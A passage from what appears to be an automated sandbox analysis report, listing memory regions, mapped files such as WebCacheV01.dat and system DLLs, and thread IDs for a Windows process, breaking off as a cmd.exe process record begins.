"c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2578 start_va = 0x9f0000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2579 start_va = 0xa00000 end_va = 0xa0ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2580 start_va = 0xa10000 end_va = 0xa1ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2581 start_va = 0xa20000 end_va = 0xa2ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2582 start_va = 0xa30000 end_va = 0xa3ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2583 start_va = 0xa40000 end_va = 0xa4ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2584 start_va = 0xa50000 end_va = 0xa5ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2585 start_va = 0xa60000 end_va = 0xa6ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2586 start_va = 0xa70000 end_va = 0xa7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2587 start_va = 0xa80000 end_va = 0xa8ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2588 start_va = 0xa90000 end_va = 0xa9ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2589 start_va = 0xaa0000 end_va = 0xaaffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2590 start_va = 0xab0000 end_va = 0xab7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 2591 start_va = 0xac0000 end_va = 0xacffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2592 start_va = 0xad0000 end_va = 0xbcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 2593 start_va = 0xbd0000 end_va = 0xd57fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bd0000" filename = "" Region: id = 2594 start_va = 0xd60000 end_va = 0xee0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d60000" filename = "" Region: id = 2595 start_va = 0xef0000 end_va = 0x22effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ef0000" filename = "" Region: id = 2596 start_va = 0x22f0000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000022f0000" filename = "" Region: id = 2597 start_va = 0x2300000 end_va = 0x230ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002300000" filename = "" Region: id = 2598 start_va = 0x2310000 end_va = 0x231ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002310000" filename = "" Region: id = 2599 start_va = 0x2320000 end_va = 0x232ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002320000" filename = "" Region: id = 2600 start_va = 0x2330000 end_va = 0x233ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002330000" filename = "" Region: id = 2601 start_va = 0x2340000 end_va = 0x234ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002340000" filename = "" Region: id = 2602 start_va = 0x2350000 end_va = 0x2357fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 2603 start_va = 0x2360000 end_va = 0x2367fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2604 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2605 start_va = 0x2380000 end_va = 0x238ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2606 start_va = 0x2390000 end_va = 0x239ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2607 start_va = 0x23a0000 end_va = 0x23affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2608 start_va = 0x23b0000 end_va = 0x23bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023b0000" filename = "" Region: id = 2609 start_va = 0x23c0000 end_va = 0x24bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023c0000" filename = "" Region: id = 2610 start_va = 0x24c0000 end_va = 0x24c7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024c0000" filename = "" Region: id = 2611 start_va = 0x24d0000 end_va = 0x24d7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 2612 start_va = 0x24e0000 end_va = 0x24effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2613 start_va = 0x24f0000 end_va = 0x24f7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024f0000" filename = "" Region: id = 2614 start_va = 0x2500000 end_va = 0x2507fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 2615 start_va = 0x2510000 end_va = 0x251ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2616 start_va = 0x2520000 end_va = 0x252ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2617 start_va = 0x2540000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2618 start_va = 0x25c0000 end_va = 0x28f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2619 start_va = 0x2900000 end_va = 0x38fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2620 start_va = 0x3900000 end_va = 0x398ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003900000" filename = "" Region: id = 2621 start_va = 0x3990000 end_va = 0x399ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2622 start_va = 0x39d0000 end_va = 0x39dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2623 start_va = 0x39e0000 end_va = 0x39effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2624 start_va = 0x39f0000 end_va = 0x39fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2625 start_va = 0x3a00000 end_va = 0x3a07fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a00000" filename = "" Region: id = 2626 start_va = 0x3a10000 end_va = 0x3a1ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2627 start_va = 0x3a30000 end_va = 0x3a3ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2628 start_va = 0x3a40000 end_va = 0x3a4ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2629 start_va = 0x3a50000 end_va = 0x3a57fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a50000" filename = "" Region: id = 2630 start_va = 0x3a60000 end_va = 0x3a6ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2631 start_va = 0x3a80000 end_va = 0x3a8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a80000" filename = "" Region: id = 2632 start_va = 0x3ae0000 end_va = 0x3aeffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2633 start_va = 0x3af0000 end_va = 0x3afffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2634 start_va = 0x3b00000 end_va = 0x3b0ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2635 start_va = 0x3b10000 end_va = 0x3b1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b10000" filename = "" Region: id = 2636 start_va = 0x3b20000 end_va = 0x3b2ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2637 start_va = 0x3b30000 end_va = 0x3b3ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2638 start_va = 0x3b40000 end_va = 0x3b4ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2639 start_va = 0x3b50000 end_va = 0x3c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b50000" filename = "" Region: id = 2640 start_va = 0x3c50000 end_va = 0x3c5ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2641 start_va = 0x3c60000 end_va = 0x3c6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c60000" filename = "" Region: id = 2642 start_va = 0x3c70000 end_va = 0x3c7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2643 start_va = 0x3c80000 end_va = 0x3c8ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2644 start_va = 0x3ca0000 end_va = 0x3caffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2645 start_va = 0x3cb0000 end_va = 0x3daffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cb0000" filename = "" Region: id = 2646 start_va = 0x3db0000 end_va = 0x3eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003db0000" filename = "" Region: id = 2647 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2648 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 2649 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 2650 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 2651 start_va = 0x7ff7f8d90000 end_va = 0x7ff7f8d96fff monitored = 0 entry_point = 0x7ff7f8d91570 region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\System32\\dllhost.exe" (normalized: "c:\\windows\\system32\\dllhost.exe") Region: id = 2652 start_va = 0x7ffb14670000 end_va = 0x7ffb14684fff monitored = 0 entry_point = 0x7ffb14675740 region_type = mapped_file name = "profext.dll" filename = "\\Windows\\System32\\profext.dll" (normalized: "c:\\windows\\system32\\profext.dll") Region: id = 2653 start_va = 0x7ffb18310000 end_va = 0x7ffb18608fff monitored = 0 entry_point = 0x7ffb183d7280 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 2654 start_va = 0x7ffb19d70000 end_va = 0x7ffb19ffdfff monitored = 0 entry_point = 0x7ffb19e40f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 2655 start_va = 0x7ffb1f310000 end_va = 0x7ffb1f691fff monitored = 0 entry_point = 0x7ffb1f361220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 2656 start_va = 0x7ffb23aa0000 end_va = 0x7ffb23b35fff monitored = 0 entry_point = 0x7ffb23ac5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 2657 start_va = 0x7ffb24610000 end_va = 0x7ffb24640fff monitored = 0 entry_point = 0x7ffb24617d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2658 start_va = 0x7ffb24880000 end_va = 0x7ffb2489efff monitored = 0 entry_point = 0x7ffb24885d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2659 start_va = 0x7ffb24bc0000 end_va = 0x7ffb24bcafff monitored = 0 entry_point = 0x7ffb24bc19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2660 start_va = 0x7ffb24fb0000 end_va = 0x7ffb24fd8fff monitored = 0 entry_point = 0x7ffb24fc4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2661 start_va = 0x7ffb25120000 end_va = 0x7ffb2512efff monitored = 0 entry_point = 0x7ffb25123210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2662 start_va = 0x7ffb25130000 end_va = 0x7ffb2517afff monitored = 0 entry_point = 0x7ffb251335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2663 start_va = 0x7ffb25180000 end_va = 0x7ffb25193fff monitored = 0 entry_point = 0x7ffb251852e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2664 start_va = 0x7ffb251b0000 end_va = 0x7ffb25397fff monitored = 0 entry_point = 0x7ffb251dba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2665 start_va = 0x7ffb25640000 end_va = 0x7ffb256a9fff monitored = 0 entry_point = 0x7ffb25676d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2666 start_va = 0x7ffb256b0000 end_va = 0x7ffb25764fff monitored = 0 entry_point = 0x7ffb256f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2667 start_va = 0x7ffb25800000 end_va = 0x7ffb25842fff monitored = 0 entry_point = 0x7ffb25814b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2668 start_va = 0x7ffb25850000 end_va = 0x7ffb25e93fff monitored = 0 entry_point = 0x7ffb25a164b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 2669 start_va = 0x7ffb25f00000 end_va = 0x7ffb26085fff monitored = 0 entry_point = 0x7ffb25f4ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2670 start_va = 0x7ffb26090000 end_va = 0x7ffb261e5fff monitored = 0 entry_point = 0x7ffb2609a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2671 start_va = 0x7ffb261f0000 end_va = 0x7ffb2622afff monitored = 0 entry_point = 0x7ffb261f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2672 start_va = 0x7ffb26230000 end_va = 0x7ffb262dcfff monitored = 0 entry_point = 0x7ffb262481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2673 start_va = 0x7ffb262e0000 end_va = 0x7ffb26331fff monitored = 0 entry_point = 0x7ffb262ef530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2674 start_va = 0x7ffb264f0000 end_va = 0x7ffb2658cfff monitored = 0 entry_point = 0x7ffb264f78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2675 start_va = 0x7ffb26590000 end_va = 0x7ffb266abfff monitored = 0 entry_point = 0x7ffb265d02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2676 start_va = 0x7ffb266b0000 end_va = 0x7ffb26756fff monitored = 0 entry_point = 0x7ffb266bb4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2677 start_va = 0x7ffb267e0000 end_va = 0x7ffb27d3efff monitored = 0 entry_point = 0x7ffb269411f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2678 start_va = 0x7ffb27d40000 end_va = 0x7ffb27d9afff monitored = 0 entry_point = 0x7ffb27d538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2679 start_va = 0x7ffb27e00000 end_va = 0x7ffb2807cfff monitored = 0 entry_point = 0x7ffb27ed4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2680 start_va = 0x7ffb288f0000 end_va = 0x7ffb289b0fff monitored = 0 entry_point = 0x7ffb28910da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2681 start_va = 0x7ffb28a50000 end_va = 0x7ffb28af6fff monitored = 0 entry_point = 0x7ffb28a658d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2682 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2685 start_va = 0x2530000 end_va = 0x2530fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002530000" filename = "" Region: id = 2698 start_va = 0x24e0000 end_va = 0x24e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024e0000" filename = "" Region: id = 2703 start_va = 0x24e0000 end_va = 0x24e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024e0000" filename = "" Region: id = 5151 start_va = 0x24e0000 end_va = 0x24e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024e0000" filename = "" Thread: id = 315 os_tid = 0x388 Thread: id = 316 os_tid = 0xd4c Thread: id = 317 os_tid = 0xadc Thread: id = 318 os_tid = 0x8a0 Thread: id = 319 os_tid = 0x898 Thread: id = 320 os_tid = 0x888 Process: id = "83" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x32618000" os_pid = 